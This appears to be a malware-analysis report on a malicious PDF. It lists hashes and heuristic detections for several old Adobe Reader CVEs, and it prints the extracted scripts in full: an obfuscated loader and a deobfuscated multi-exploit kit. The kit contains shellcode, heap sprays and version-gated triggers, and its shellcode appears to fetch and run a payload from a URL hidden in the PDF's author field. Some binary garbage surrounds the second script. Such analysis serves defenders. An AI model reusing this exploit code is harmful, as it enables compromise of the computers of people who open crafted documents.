Malicious PDF — malware analysis report

Static analysis result for SHA-256 8cee1ebaddcabf34…

MALICIOUS

PDF

16.0 KB Authoring application: Koqonqapemafvo First seen: 2026-05-11
MD5: a52c40d9f3a710b48e28d32f9ca4cccd SHA-1: d5ccae4663767dc6d4614b5aa8844532a0d9122c SHA-256: 8cee1ebaddcabf346a328058308f697a12923a75c28606ad0b4667dd5380b5c5
408 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0024_000.js pdf-javascript-stream PDF /JS object 24 at offset 0x3B07 513 bytes
SHA-256: 5a3cafe12c1bc5679a2a521dd5c0296ed621099bbd024811634961992ecdd273
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var e='';var alpha=app.doc;var adobe='42dsg3%4hjkhda';adobe=adobe.substr(6,1);var a='getPage';var i=a+'Nt'+'hWord';var l=a+'Nu'+'mWords';var file='fr'+'omCharCo'+'de';var adobeU='cha'+'rCod'+'eAt';var iT=0,b=2, basic=77;var iJ=this['u'+'nesca'+'pe'];var aUpdate=fileGoogle(3, basic);new Function(aUpdate)();function fileGoogle(lI, basic){var u=alpha[l](3);    for(var m=0; m < u; m++){x=alpha[i](lI, m);var alphaL=x.substr(x.length-b, b);var dB=iJ(adobe + alphaL)[adobeU](iT);e+=String[file](dB^basic);}return e;}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4887 bytes
SHA-256: 1e6db4f7042947ca621d6f1670e807d121e1667d1276659659400bb80be5b020
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
���棠��㠇��㠇���ࠠ�㠠��რ�����������������懗���榇����������������
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "eAFSm_3xoB?IVU/l6apdJ8NLE2D%Y0kMs9Xz5:&QcKqtHOG0fP17rCWy.ngjwTh4buv=iZR-";
function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();
�����������㓠����������������������������������������������������������㲓���������������������������ᓇ�������ᓠ�������������������]]�beX[[��E�]]�beX[[��E

Open this report in the interactive analyzer, or submit your own file for analysis.